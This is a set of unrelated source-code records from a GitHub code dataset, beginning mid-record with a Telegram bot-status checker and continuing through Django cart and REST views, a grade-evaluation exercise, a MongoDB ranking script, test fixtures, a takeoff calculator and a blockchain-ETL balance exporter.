{\"username\": None, \"status\": False}\n\n\nasync def main():\n await get_all_bots()\n while True:\n async for msg in client.iter_history(chat, reverse=True, 
offset_id=Status[\"Last\"]):\n if msg.text:\n try:\n await check_msg(msg)\n except Exception as e:\n print(f\"Error: {e}\")\n await sleep(sleep_time)\n\n\nasync def check_msg(msg: Message):\n text = \"\"\n edit = False\n for line in msg.text.markdown.split('\\n'):\n for word in line.split():\n if word.startswith('@') and word.lower().endswith('bot'):\n off = line.find(offline_mark)\n await sleep(send_time)\n try:\n work, by_username = await check_bot(word)\n except FloodWait as e:\n wait = e.x + 10 * 60\n Status[\"Flood\"] = int(time()) + wait\n await sleep(wait)\n work, by_username = await check_bot(word)\n except Exception as e:\n print(f\"Error: {e}\")\n continue\n if work:\n if off > -1:\n text += f\"\\n{line[:off - 1]}\"\n edit = True\n else:\n text += f\"\\n{line}\"\n else:\n if off > -1:\n text += f\"\\n{line}\"\n else:\n text += f\"\\n{line} {offline_mark}\"\n edit = True\n if by_username:\n Status[\"UserName\"] += 1\n await sleep(username_time)\n else:\n Status[\"ID\"] += 1\n break\n else:\n text += f\"\\n{line}\"\n if edit:\n await msg.edit_text(text, reply_markup=msg.reply_markup)\n await db_last.update_one({}, {\"$set\": {\"last\": msg.message_id}}, upsert=True)\n\n\nasync def check_bot(username):\n bot[\"username\"] = username[1:]\n bot[\"status\"] = False\n if username[1:] in AllBots:\n b = AllBots[username[1:]]\n await client.send_message(b[\"id\"], \"/start\")\n by_username = False\n else:\n msg = await client.send_message(username[1:], \"/start\")\n data = {\"id\": msg.chat.id, \"username\": username[1:]}\n await db.insert_one(data)\n AllBots[username[1:]] = data\n by_username = True\n await sleep(time_out)\n return bot[\"status\"], by_username\n\n\n@client.on_message(filters.bot)\nasync def response(_, msg):\n if msg.chat.username == bot[\"username\"]:\n bot[\"status\"] = True\n\n\n@client.on_message(filters.command(\"all\", prefixes=\".\") & filters.outgoing)\nasync def all_bots(_, msg: Message):\n file = \"All-Bots.txt\"\n with open(file, \"w\") as f:\n for i in AllBots.values():\n f.write(f\"@{i['username']}\\n{i['id']}\\n\\n\")\n await msg.reply_document(file)\n\n\n@client.on_message(filters.command(\"status\", prefixes=\".\") & filters.outgoing)\nasync def bot_status(_, msg: Message):\n if time() > Status[\"Flood\"]:\n flood = \"None\"\n else:\n flood = str(timedelta(seconds=int(Status[\"Flood\"] - time())))\n text = (f\"Last-Message-ID: {Status['Last']}\\n\\n\"\n f\"By-UserName: {Status['UserName']}\\n\\n\"\n f\"By-ID: {Status['ID']}\\n\\n\"\n f\"Flood: {flood}\")\n await msg.edit_text(text)\n\n\nasync def get_all_bots():\n async for b in db.find({}):\n AllBots[b[\"username\"]] = b\n last = await db_last.find_one({})\n if last is None:\n Status[\"Last\"] = 1\n await db_last.insert_one({\"last\": 1})\n else:\n Status[\"Last\"] = last[\"last\"]\n\n\nclient.start()\nclient.loop.run_until_complete(main())\n","repo_name":"Sallat-M/BotsChecker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"16359938563","text":"from .carro import shopping_cart\nfrom Apps.Store.models import productos_model\nfrom django.shortcuts import redirect\n\ndef agregar_producto(request, producto_id):\n carro = shopping_cart(request)\n product_to_add= productos_model.objects.get(id=producto_id)\n carro.agregar(producto=product_to_add)\n return redirect(\"store\")\n\ndef eliminar_producto(request, producto_id):\n carro = shopping_cart(request)\n 
product_to_add= productos_model.objects.get(id=producto_id)\n carro.eliminar(producto=product_to_add)\n return redirect(\"store\")\n\ndef restar_producto(request, producto_id):\n carro = shopping_cart(request)\n product_to_add = productos_model.objects.get(id=producto_id)\n carro.restar_producto(producto=product_to_add)\n return redirect(\"store\")\n\ndef limpiar_carro(request):\n carro = shopping_cart(request)\n carro.limpiar_carro()\n return redirect(\"store\")\n\n\n\n\n\n\n\n","repo_name":"pablonalonso/E-Commerce-Django","sub_path":"Apps/ShoppingCart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"40191689595","text":"estudiantes = [\n {\n 'nombre': 'juan',\n 'apellido': 'perez',\n 'notas': {\n 'MAT': 30,\n 'QMC': 30,\n 'FIS': 30,\n 'LAB': 30\n },\n 'extras': [2, 3, 1, 1, 1],\n 'asistencia': 90\n },\n {\n 'nombre': 'ana',\n 'apellido': 'rivera',\n 'notas': {\n 'MAT': 98,\n 'QMC': 98,\n 'FIS': 98,\n 'LAB': 98\n },\n 'extras': [1],\n 'asistencia': 100\n }\n]\n\n\nclass Evaluador:\n \"\"\"This class implements several functions to compute averages\n for a list of students and obtain other additional data; it also\n implements a function to write a grade report\"\"\"\n\n def __init__(self, lista_estudiantes, min_asistencia, max_extras):\n self.lista_estudiantes = lista_estudiantes\n self.min_asistencia = min_asistencia\n self.max_extras = max_extras\n\n def calcular_promedios(self):\n promedios = []\n for estudiante in self.lista_estudiantes:\n nombre_completo = estudiante['nombre'].capitalize() + ' ' + estudiante['apellido'].capitalize()\n notas = estudiante.get('notas', {})\n asistencia = estudiante['asistencia']\n extras = sum(estudiante.get('extras', []))\n\n if not notas or asistencia < self.min_asistencia:\n promedio_final = 0\n else:\n promedio_notas = sum(notas.values()) / len(notas)\n promedio_final = min(promedio_notas + extras, 100)\n\n promedios.append({'nombre completo': nombre_completo, 'promedio': promedio_final})\n\n return promedios\n\n def obtener_mejor_estudiante(self):\n promedios = self.calcular_promedios()\n mejor_estudiante = max(promedios, key=lambda estudiante: estudiante['promedio'])\n return mejor_estudiante\n\n def salvar_datos(self, nombre_archivo):\n import csv\n\n promedios = self.calcular_promedios()\n\n with open(nombre_archivo, 'w', newline='') as archivo_csv:\n campos = ['Nombre Completo', 'Asistencia', 'MAT', 'FIS', 'QMC', 'LAB', 'Total Extras', 'Promedio Final',\n 'Observación']\n escritor_csv = csv.DictWriter(archivo_csv, fieldnames=campos)\n\n escritor_csv.writeheader()\n\n for estudiante in self.lista_estudiantes:\n nombre_completo = estudiante['nombre'].capitalize() + ' ' + estudiante['apellido'].capitalize()\n notas = estudiante.get('notas', {})\n asistencia = estudiante['asistencia']\n extras = sum(estudiante.get('extras', []))\n if not notas or asistencia < self.min_asistencia:\n promedio_final = 0\n observacion = 'REPROBADO'\n else:\n promedio_notas = sum(notas.values()) / len(notas)\n promedio_final = min(promedio_notas + extras, 100)\n observacion = 'APROBADO' if promedio_final > 50 else 'REPROBADO'\n\n fila = {\n 'Nombre Completo': nombre_completo,\n 'Asistencia': asistencia,\n 'MAT': notas.get('MAT', 0),\n 'FIS': notas.get('FIS', 0),\n 'QMC': notas.get('QMC', 0),\n 'LAB': notas.get('LAB', 0),\n 'Total Extras': extras,\n 'Promedio Final': promedio_final,\n 'Observación': 
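The cart views above delegate to a `shopping_cart` class imported from a `carro` module that is not included in this record. A minimal sketch of what such a session-backed cart might look like; this is an assumption about the hidden module, not its actual code, and only mirrors the method names the views call:

```python
class shopping_cart:
    """Hypothetical session-backed cart matching the calls in views.py above."""
    def __init__(self, request):
        self.session = request.session
        self.carro = self.session.setdefault("carro", {})  # {product_id: {...}}

    def _save(self):
        self.session["carro"] = self.carro
        self.session.modified = True  # tell Django the session changed

    def agregar(self, producto):
        item = self.carro.setdefault(str(producto.id), {"cantidad": 0})
        item["cantidad"] += 1
        self._save()

    def restar_producto(self, producto):
        item = self.carro.get(str(producto.id))
        if item:
            item["cantidad"] -= 1
            if item["cantidad"] <= 0:
                self.carro.pop(str(producto.id))
            self._save()

    def eliminar(self, producto):
        self.carro.pop(str(producto.id), None)
        self._save()

    def limpiar_carro(self):
        self.carro = {}
        self._save()
```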
observacion\n }\n escritor_csv.writerow(fila)\n\n\n# -----------------------------------------#\n# ----> DO NOT MODIFY FROM HERE ON! <------#\n# -----------------------------------------#\ndef comparar_archivo_notas(archivo):\n with open('ejemplo_notas.csv', 'r') as archivo_correcto:\n correcto_str = archivo_correcto.read()\n\n with open(archivo, 'r') as archivo:\n archivo_str = archivo.read()\n\n return correcto_str == archivo_str\n\n\nif __name__ == '__main__':\n # initial data\n nombre_archivo = 'notas.csv'\n notas_correcto = [{'nombre completo': 'Juan Perez', 'promedio': 35.0}, {'nombre completo': 'Ana Rivera', 'promedio': 99.0}]\n mejor_correcto = {'nombre completo': 'Ana Rivera', 'promedio': 99.0}\n\n # Instantiate the evaluator\n evaluador = Evaluador(lista_estudiantes=estudiantes, min_asistencia=80, max_extras=5)\n # compute the averages\n notas = evaluador.calcular_promedios()\n print(f'calcular_promedios: {notas}')\n if notas == notas_correcto:\n print('Calculo de promedios correcto!')\n else:\n print(f'ERROR, lista de promedios esperada: {notas_correcto}')\n # get the best student\n mejor = evaluador.obtener_mejor_estudiante()\n print(f'obtener_mejor_estudiante: {mejor}')\n if mejor == mejor_correcto:\n print('Mejor estudiante correcto!')\n else:\n print(f'ERROR, mejor estudiante esperado: {mejor_correcto}')\n # save the data to a file\n evaluador.salvar_datos(nombre_archivo)\n if comparar_archivo_notas(nombre_archivo):\n print('Generacion de archivo correcta')\n else:\n print('Generacion de archivos incorrecta, ver archivo \"ejemplo_notas.csv\"')\n\n #Email: eduardo.laruta+tareas@gmail.com\n #Two emails\n #1 Infografia_1_Michel","repo_name":"Bussy888/Infografia-2023","sub_path":"Ejercicio1/estudiantes.py","file_name":"estudiantes.py","file_ext":"py","file_size_in_byte":5322,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"37814673947","text":"import sys\nimport time\nimport backend_mongo as mo\n\n\nusers, tradeables, logs, webapp_current_ranking = mo.login()\n\n\ndef user_generator(umid_list):\n for umid in umid_list:\n yield mo.User(umid)\n\n\ndef get_rankings():\n print(f'{time.strftime(\"%M:%S\", time.gmtime())} ranking')\n \"\"\" future feature: to get one class' ranking - change umid_list to match for ID list instead of finding all \"\"\"\n ledger = []\n umid_list = [x['UMID'] for x in users.find({}, {\"_id\": 0, \"UMID\": 1})]\n\n # generate the ledger from list of UMIDs\n for user in user_generator(umid_list):\n ledger.append(dict(UMID=user.umid, name=user.name, balance=user.balance))\n\n # sort the ledger by balance\n ledger = sorted(ledger, key=lambda k: float(k['balance'].replace(',', '')))[::-1]\n\n # add rank to each\n for k, i in enumerate(ledger):\n ledger[k]['rank'] = k + 1\n\n # purge rankings and insert new data\n print(f'{time.strftime(\"%M:%S\", time.gmtime())} db update')\n webapp_current_ranking.delete_many({\"UMID\": {\"$nin\": umid_list}}) # delete those no longer in the ledger\n webapp_current_ranking.insert_many(ledger)\n print(f'{time.strftime(\"%M:%S\", time.gmtime())} complete')\n return True\n\n\ndef update_log(text, comment=''):\n logs.update_one(\n {\"service\": 'backend_updater'},\n {\"$push\": {\n 'history': {\n '$each': [f'{time.strftime(\"%b %d, %Y %H:%M\", time.localtime())} :: {text} :: {comment}'],\n '$position': 0\n }\n }},\n upsert=True\n )\n\n\nif __name__ == \"__main__\":\n try:\n get_rankings()\n update_log('Rankings Complete')\n except Exception as err:\n print(err)\n 
update_log(err, '')\n finally:\n sys.exit()\n","repo_name":"nconnector/portfolio-management-simulator","sub_path":"backend/backend_ranking.py","file_name":"backend_ranking.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"9304743915","text":"\"\"\"\nDicts for each test user. A function to create them.\n\"\"\"\n\nimport datetime\nimport logging\n\nfrom terraintracker.models.user import User\n\nlogger = logging.getLogger(__name__)\n\nTEST_USER_PASSWORD = 'Test1234'\n\n\ndef create_test_user(user_dict):\n u = User(_id=user_dict['id'], name=user_dict['phone'], _is_test_user=True)\n u.password = TEST_USER_PASSWORD\n u.role = User.Role.tower.value\n u.active = True\n for k in user_dict.keys():\n setattr(u, k, user_dict[k])\n u.update_position(user_dict['last_lat_seen'], user_dict['last_long_seen'])\n logger.debug(\"created test user: {}\".format(User.query.get(u.id)))\n return u\n\n\n# Eligible users are 5 users near each other, like:\n# o\n# o o o\n# o\n# Left and right are very far apart.\n\nELIGIBLE_USERS = [\n {\n 'phone': '1111111111',\n 'id': 'test_left',\n 'last_long_seen': '-81.333583',\n 'last_lat_seen': '31.252527',\n },\n {\n 'phone': '222222222',\n 'id': 'test_right',\n 'last_long_seen': '-81.120793',\n 'last_lat_seen': '31.242464',\n },\n {\n 'phone': '3333333333',\n 'id': 'test_top',\n 'last_long_seen': '-81.206815',\n 'last_lat_seen': '31.327326',\n },\n {\n 'phone': '4444444444',\n 'id': 'test_bottom',\n 'last_long_seen': '-81.198940',\n 'last_lat_seen': '31.202165',\n },\n {\n 'phone': '5555555555',\n 'id': 'test_middle',\n 'last_long_seen': '-81.198062',\n 'last_lat_seen': '31.254075',\n },\n]\n\n# For each requestor, which eligible users should they request?\nEXPECTED_REQUESTEE_IDS_BY_REQUESTOR = {\n\n # Middle reaches everything but itself\n 'test_middle': set([u['id'] for u in ELIGIBLE_USERS if u['id'] != 'test_middle']),\n\n # Left and right are very far apart, so they won't grab each other\n 'test_left': set([u['id'] for u in ELIGIBLE_USERS if u['id'] not in ['test_left', 'test_right']]),\n 'test_right': set([u['id'] for u in ELIGIBLE_USERS if u['id'] not in ['test_left', 'test_right']]),\n\n # Top and bottom are close to each other. 
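get_rankings above sorts by parsing comma-formatted balance strings, then stamps a 1-based rank onto each entry. The same pattern in isolation (toy ledger; `reverse=True` plays the role of the `[::-1]` slice):

```python
ledger = [
    {"UMID": 1, "balance": "1,250.00"},
    {"UMID": 2, "balance": "980.10"},
    {"UMID": 3, "balance": "10,040.55"},
]
# strip thousands separators before converting to float, highest balance first
ledger.sort(key=lambda k: float(k["balance"].replace(",", "")), reverse=True)
for rank, entry in enumerate(ledger, start=1):
    entry["rank"] = rank
print([e["UMID"] for e in ledger])  # [3, 1, 2]
```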
Reach everything but themselves\n 'test_top': set([u['id'] for u in ELIGIBLE_USERS if u['id'] != 'test_top']),\n 'test_bottom': set([u['id'] for u in ELIGIBLE_USERS if u['id'] != 'test_bottom']),\n 'test_not_active': set(),\n}\n\n\nLONELY_USER = {\n 'phone': '7777777778',\n 'id': 'test_far_away',\n 'last_lat_seen': '-31.254075',\n 'last_long_seen': ' 81.198062',\n 'active': False}\n\nINACTIVE_USER = {\n 'phone': '7777777777',\n 'id': 'test_not_active',\n 'last_lat_seen': '31.254075',\n 'last_long_seen': '-81.198062',\n 'active': False}\n\n\nINELIGIBLE_USERS = [LONELY_USER, INACTIVE_USER]\n\n\n# === Data for test_get_most_recent_user_by_phone === #\n# The code below is deprecated:\nPHONE_TEST_USER_NEWEST = {\n 'id': 'phone_test_user_newest',\n 'last_time_seen': datetime.datetime.now(),\n 'phone': '8888888888'}\n\nPHONE_TEST_USER_OLDEST = {\n 'id': 'phone_test_user_oldest',\n 'last_time_seen': datetime.datetime.now() - datetime.timedelta(days=1),\n 'phone': '9999999999'}\n\nPHONE_TEST_USER_NO_LAST_SEEN = {\n 'id': 'phone_test_user_no_last_seen',\n 'phone': '0000000000'}\n\nUSERS_SHARING_PHONE = [PHONE_TEST_USER_NEWEST, PHONE_TEST_USER_OLDEST, PHONE_TEST_USER_NO_LAST_SEEN]\n\nALL_USERS = ELIGIBLE_USERS + INELIGIBLE_USERS + USERS_SHARING_PHONE\n","repo_name":"AdamBSteele/BoatTowing","sub_path":"web/terraintracker/tests/data/user_test_data.py","file_name":"user_test_data.py","file_ext":"py","file_size_in_byte":3376,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"15192887515","text":"from numbers import Real\nfrom typing import Callable\n\ntry:\n from constants import (\n MASS_NO_CHARGE_KG,\n MAX_TAKEOFF_TIME_SEC,\n TAKE_OFF_VELOCITY_MPS,\n ENGINES_FORCE_NEWTON,\n VELOCITY_0_MPS,\n )\nexcept ImportError:\n from backend.constants import (\n MASS_NO_CHARGE_KG,\n MAX_TAKEOFF_TIME_SEC,\n TAKE_OFF_VELOCITY_MPS,\n ENGINES_FORCE_NEWTON,\n VELOCITY_0_MPS,\n )\n\nminimal_acceleration = TAKE_OFF_VELOCITY_MPS / MAX_TAKEOFF_TIME_SEC\nmaximal_total_mass = ENGINES_FORCE_NEWTON / minimal_acceleration\nmaximal_charge_mass = maximal_total_mass - MASS_NO_CHARGE_KG\n\n\nclass ChargeMassErrorTooBig(ValueError):\n pass\n\n\nclass InvalidChargeMass(ValueError):\n pass\n\n\ndef is_valid_charge_mass(charge_mass_kg) -> bool:\n \"\"\"Check if the charge mass is valid.\"\"\"\n return isinstance(charge_mass_kg, Real) and charge_mass_kg >= 0\n\n\ndef is_valid_charge_mass_string(charge_mass_kg_str: str) -> bool:\n \"\"\"Check if the charge mass is valid.\"\"\"\n try:\n charge_mass_kg = float(charge_mass_kg_str)\n except ValueError:\n return False\n return is_valid_charge_mass(charge_mass_kg)\n\n\ndef check_charge_mass_input(func: Callable):\n \"\"\" A decorator Check if the charge mass input to the function is valid.\n If not, raise an InvalidChargeMass exception.\"\"\"\n\n def wrapper(*args, **kwargs):\n charge_mass_kg = kwargs[\"charge_mass_kg\"] if \"charge_mass_kg\" in kwargs else args[0]\n if not is_valid_charge_mass(charge_mass_kg):\n raise InvalidChargeMass(\"The charge mass must be a non-negative number.\")\n return func(*args, **kwargs)\n\n return wrapper\n\n\ndef check_charge_mass_too_big(func: Callable):\n \"\"\"A decorator that checks if the charge mass is too big.\"\"\"\n\n def wrapper(*args, **kwargs):\n charge_mass_kg = kwargs[\"charge_mass_kg\"] if \"charge_mass_kg\" in kwargs else args[0]\n if charge_mass_kg > maximal_charge_mass:\n raise ChargeMassErrorTooBig(\"The charge mass is too big.\")\n return func(*args, **kwargs)\n\n return 
wrapper\n\n\n@check_charge_mass_input\n@check_charge_mass_too_big\ndef calculate_acceleration(charge_mass_kg: Real) -> Real:\n    \"\"\"Calculate the acceleration of the plane with a given charge mass.\n    Raises:\n        InvalidChargeMass: if the charge mass is not a non-negative number.\"\"\"\n    total_mass_kg = charge_mass_kg + MASS_NO_CHARGE_KG\n    return ENGINES_FORCE_NEWTON / total_mass_kg\n\n\n@check_charge_mass_input\n@check_charge_mass_too_big\ndef calculate_takeoff_time(charge_mass_kg: Real) -> Real:\n    \"\"\"Gets the mass of the charge in kilograms (non-negative number).\n    Calculate the time it takes to take off with the charge mass.\n    Raises:\n        ChargeMassErrorTooBig: if the plane can't take off in MAX_TAKEOFF_TIME_SEC.\n        InvalidChargeMass: if the charge mass is not a non-negative number.\"\"\"\n    acceleration_mps2 = calculate_acceleration(charge_mass_kg)\n    takeoff_time_sec = TAKE_OFF_VELOCITY_MPS / acceleration_mps2\n    if takeoff_time_sec > MAX_TAKEOFF_TIME_SEC:\n        raise ChargeMassErrorTooBig(\"The plane will not take off in time.\")\n    return takeoff_time_sec\n\n\n@check_charge_mass_input\n@check_charge_mass_too_big\ndef calculate_takeoff_distance(charge_mass_kg: Real) -> Real:\n    \"\"\"Gets the mass of the charge in kilograms (non-negative number).\n    Calculate the distance it takes to take off with a given charge mass.\n    Raises:\n        ChargeMassErrorTooBig: if the plane can't take off in MAX_TAKEOFF_TIME_SEC.\n        InvalidChargeMass: if the charge mass is not a non-negative number.\n    \"\"\"\n    acceleration_mps2 = calculate_acceleration(charge_mass_kg)\n    takeoff_time_sec = calculate_takeoff_time(charge_mass_kg)\n    return (VELOCITY_0_MPS * takeoff_time_sec) + (acceleration_mps2 * takeoff_time_sec ** 2) / 2\n\n\n@check_charge_mass_input\ndef calculate_mass_to_destroy(charge_mass_kg: Real) -> Real:\n    \"\"\"Gets the mass of the charge in kilograms (non-negative number).\n    If the plane can take off in time,\n    you don't need to destroy any charge, so the function returns 0.\n    Else, the function returns the mass of the charge that you need to destroy\n    in order to take off in time.\n    Raises:\n        InvalidChargeMass: if the charge mass is not a non-negative number.\"\"\"\n    if charge_mass_kg <= maximal_charge_mass:\n        # you don't need to destroy any charge\n        return 0\n    return charge_mass_kg - maximal_charge_mass\n\n\ndef main():\n    \"\"\"The service where the user enters the charge mass in kilograms.\n    If the charge mass is not a non-negative number, the user will be asked to enter it again.\n    If the charge mass is too big for the plane to take off in time,\n    the user will be asked to destroy some charge mass in order to take off in time.\n    Else:\n    The service will print the time and distance it takes to take off with the charge mass.\"\"\"\n    charge_mass_kg_str = input(\"Enter the charge mass in kg: \")\n    while not is_valid_charge_mass_string(charge_mass_kg_str):\n        print(\"The charge mass must be a non-negative number.\")\n        charge_mass_kg_str = input(\"Enter the charge mass in kg: \")\n\n    charge_mass_kg = float(charge_mass_kg_str)\n\n    try:\n        takeoff_time_sec = calculate_takeoff_time(charge_mass_kg)\n        print(f\"The plane will take off in {takeoff_time_sec} seconds.\")\n        takeoff_distance_m = calculate_takeoff_distance(charge_mass_kg)\n        print(f\"The plane will take off after {takeoff_distance_m} meters.\")\n    except ChargeMassErrorTooBig:\n        print(\"The plane will not take off in time.\")\n        print(f\"In order to take off in time, you need to destroy\"\n              f\" 
{calculate_mass_to_destroy(charge_mass_kg)} kg of charge.\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"yonikremer/golden_route","sub_path":"backend/business_logic.py","file_name":"business_logic.py","file_ext":"py","file_size_in_byte":5833,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"12148636123","text":"import logging\nimport click\n\nfrom blockchainetl.cli.utils import pick_random_provider_uri, evm_chain_options\nfrom blockchainetl.streaming.streamer import Streamer\nfrom blockchainetl.thread_local_proxy import ThreadLocalProxy\nfrom blockchainetl.enumeration.entity_type import EntityType, parse_entity_types\nfrom blockchainetl.jobs.exporters.postgres_item_exporter import PostgresItemExporter\nfrom blockchainetl.jobs.exporters.converters import NanToNoneItemConverter\nfrom blockchainetl.streaming import postgres_utils\nfrom ethereumetl.streaming.eth_token_balance_adapter import EthTokenBalanceAdapter\nfrom ethereumetl.streaming.postgres_tables import (\n TOKEN_HISTORY_BALANCES,\n TOKEN_LATEST_BALANCES,\n)\nfrom ethereumetl.streaming.postgres_hooks import upsert_latest_balances\nfrom ethereumetl.providers.auto import get_provider_from_uri\n\n\n@click.command(context_settings=dict(help_option_names=[\"-h\", \"--help\"]))\n@evm_chain_options\n@click.option(\n \"-l\",\n \"--last-synced-block-file\",\n required=True,\n show_default=True,\n envvar=\"BLOCKCHAIN_ETL_LAST_SYNCFILE\",\n help=\"The file used to store the last synchronized block file\",\n)\n@click.option(\n \"--lag\",\n default=20,\n show_default=True,\n type=int,\n help=\"The number of blocks to lag behind the network.\",\n)\n@click.option(\n \"-p\",\n \"--provider-uri\",\n show_default=True,\n type=str,\n envvar=\"BLOCKCHAIN_ETL_PROVIDER_URI\",\n help=\"The URI of the JSON-RPC's provider.\",\n)\n@click.option(\n \"--target-db-url\",\n type=str,\n default=\"postgresql://postgres:root@127.0.0.1:5432/postgres\",\n show_default=True,\n envvar=\"BLOCKCHAIN_ETL_PG_URL\",\n help=\"The target Postgres connection url\",\n)\n@click.option(\n \"-s\",\n \"--start-block\",\n default=None,\n show_default=True,\n type=int,\n help=\"Start block, included\",\n)\n@click.option(\n \"-e\",\n \"--end-block\",\n default=None,\n show_default=True,\n type=int,\n help=\"End block, included\",\n)\n@click.option(\n \"-E\",\n \"--entity-types\",\n default=EntityType.TOKEN_LATEST_BALANCE,\n show_default=True,\n type=str,\n help=\"The list of entity types to export.\",\n)\n@click.option(\n \"--period-seconds\",\n default=120,\n show_default=True,\n type=int,\n help=\"How many seconds to sleep between syncs\",\n)\n@click.option(\n \"--rpc-batch-size\",\n default=10,\n show_default=True,\n type=int,\n help=\"How many query items are carried in a JSON RPC request, \"\n \"the JSON RPC Server is required to support batch requests\",\n)\n@click.option(\n \"--export-batch-size\",\n default=50,\n show_default=True,\n type=int,\n help=\"How many items are carried in a PostgreSQL exporting transaction\",\n)\n@click.option(\n \"-B\",\n \"--block-batch-size\",\n default=100,\n show_default=True,\n type=int,\n help=\"How many blocks of raw data are extracted at a single time\",\n)\n@click.option(\n \"--rpc-max-workers\",\n default=10,\n show_default=True,\n type=int,\n help=\"The number of RPC workers\",\n)\n@click.option(\n \"--export-max-workers\",\n default=4,\n show_default=True,\n type=int,\n help=\"The number of exporting workers\",\n)\n@click.option(\n \"--print-sql\",\n 
is_flag=True,\n    show_default=True,\n    help="Print SQL or not",\n)\n@click.option(\n    "--token-cache-path",\n    type=click.Path(exists=False, readable=True, dir_okay=True, writable=True),\n    show_default=True,\n    help="The path to store token's attributes",\n)\n@click.option(\n    "--token-address",\n    type=str,\n    show_default=True,\n    multiple=True,\n    help="Only run the given token address(es)",\n)\n@click.option(\n    "--exporter-is-multiprocess",\n    is_flag=True,\n    show_default=True,\n    help="Run PostgresItemExporter with multiple processes",\n)\n@click.option(\n    "--read-block-from-target",\n    is_flag=True,\n    show_default=True,\n    help="Read block data from target database",\n)\n@click.option(\n    "--read-log-from",\n    type=click.Choice(["rpc", "source"]),\n    default="rpc",\n    show_default=True,\n    help="(EXPERIMENTAL) Read logs from rpc or source database",\n)\n@click.option(\n    "--source-db-url",\n    type=str,\n    default=None,\n    show_default=True,\n    help="The source GreenPlum/Postgres connection url",\n)\n@click.option(\n    "--async-enrich-balance",\n    is_flag=True,\n    show_default=True,\n    help="(EXPERIMENTAL) Async enrich balances, fill in balances from onchain rpc",\n)\n@click.option(\n    "--async-enrich-redis-url",\n    type=str,\n    default="redis://@127.0.0.1:6379/4",\n    show_default=True,\n    envvar="BLOCKCHAIN_ETL_ENRICH_BALANCE_REDIS_URL",\n    help="The Redis connection url used to store the enrich-balance tasks",\n)\ndef export_balance(\n    chain,\n    last_synced_block_file,\n    lag,\n    provider_uri,\n    target_db_url,\n    start_block,\n    end_block,\n    entity_types,\n    period_seconds,\n    rpc_batch_size,\n    export_batch_size,\n    block_batch_size,\n    rpc_max_workers,\n    export_max_workers,\n    print_sql,\n    token_cache_path,\n    token_address,\n    exporter_is_multiprocess,\n    read_block_from_target,\n    read_log_from,\n    source_db_url,\n    async_enrich_balance,\n    async_enrich_redis_url,\n):\n    """Export History/Latest balances from RPC into PostgreSQL database"""\n\n    if provider_uri is None:\n        raise click.BadParameter(\n            "-p/--provider-uri or $BLOCKCHAIN_ETL_PROVIDER_URI is required"\n        )\n\n    entity_types = parse_entity_types(entity_types, ignore_unknown=True)\n    provider_uri = pick_random_provider_uri(provider_uri)\n    logging.info("Using provider: " + provider_uri)\n\n    history_balances_stmt = postgres_utils.create_insert_statement_for_table(\n        table=TOKEN_HISTORY_BALANCES,\n        on_conflict_do_update=False,\n        schema=chain,\n    )\n    latest_balances_stmt = postgres_utils.create_insert_statement_for_table(\n        table=TOKEN_LATEST_BALANCES,\n        on_conflict_do_update=True,\n        upsert_callback=upsert_latest_balances(),\n        where_callback=postgres_utils.cond_upsert_on_blknum,\n        schema=chain,\n    )\n\n    item_exporter = PostgresItemExporter(\n        target_db_url,\n        chain,\n        item_type_to_insert_stmt_mapping={\n            EntityType.TOKEN_HISTORY_BALANCE: history_balances_stmt,\n            EntityType.TOKEN_LATEST_BALANCE: latest_balances_stmt,\n        },\n        converters=(NanToNoneItemConverter(),),\n        print_sql=print_sql,\n        workers=export_max_workers,\n        pool_size=export_max_workers,\n        pool_overflow=export_max_workers + 10,\n        batch_size=export_batch_size,\n        multiprocess=exporter_is_multiprocess,\n    )\n\n    streamer_adapter = EthTokenBalanceAdapter(\n        batch_web3_provider=ThreadLocalProxy(\n            lambda: get_provider_from_uri(provider_uri, batch=True)\n        ),\n        target_db_url=target_db_url,\n        target_dbschema=chain,\n        item_exporter=item_exporter,\n        chain=chain,\n        entity_types=entity_types,\n        batch_size=rpc_batch_size,\n        max_workers=rpc_max_workers,\n        token_cache_path=token_cache_path,\n        
token_addresses=token_address,\n        read_block_from_target=read_block_from_target,\n        read_log_from=read_log_from,\n        async_enrich_balance=async_enrich_balance,\n        async_enrich_redis_url=async_enrich_redis_url,\n        source_db_url=source_db_url,\n    )\n\n    streamer = Streamer(\n        blockchain_streamer_adapter=streamer_adapter,\n        last_synced_block_file=last_synced_block_file,\n        lag=lag,\n        start_block=start_block,\n        end_block=end_block,\n        period_seconds=period_seconds,\n        block_batch_size=block_batch_size,\n    )\n    streamer.stream()\n","repo_name":"jsvisa/blockchain-etl","sub_path":"blockchainetl/cli/export_balance.py","file_name":"export_balance.py","file_ext":"py","file_size_in_byte":7622,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"}
{"seq_id":"18463540085","text":"# views.py\n# from django.shortcuts import render\nfrom django.shortcuts import get_object_or_404\n\n# from rest_framework import viewsets\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.pagination import PageNumberPagination\n\nfrom .serializers import UserinfoSerializer, TransactionSerializer\nfrom .models import UserInfo, Transaction\nfrom UTD.utd import UniqueTransactionDetect\n\nutd = UniqueTransactionDetect()\n\n# Create your views here.\nclass UserInfoViewAPI(APIView):\n    # APIView\n    def get(self, request, pk=None):\n        paginator = PageNumberPagination()\n        paginator.page_size = 3\n\n        try:\n            # Fetch the user row from the UserInfo table together with its reverse-related Transaction rows for the given pk\n            user_info = get_object_or_404(UserInfo.objects.prefetch_related('transaction'), pk=pk)\n            # Fetch the reverse-related transaction data page by page using the paginator\n            paginated_queryset = paginator.paginate_queryset(user_info.transaction.all(), request)\n\n            # Feed the data into the serializers\n            transaction_serializer = TransactionSerializer(paginated_queryset, many=True, context={\"request\": request})\n            userinfo_serializer = UserinfoSerializer(user_info, context={'request': request})\n\n            return Response({\"result\": {\n                'userinfo': 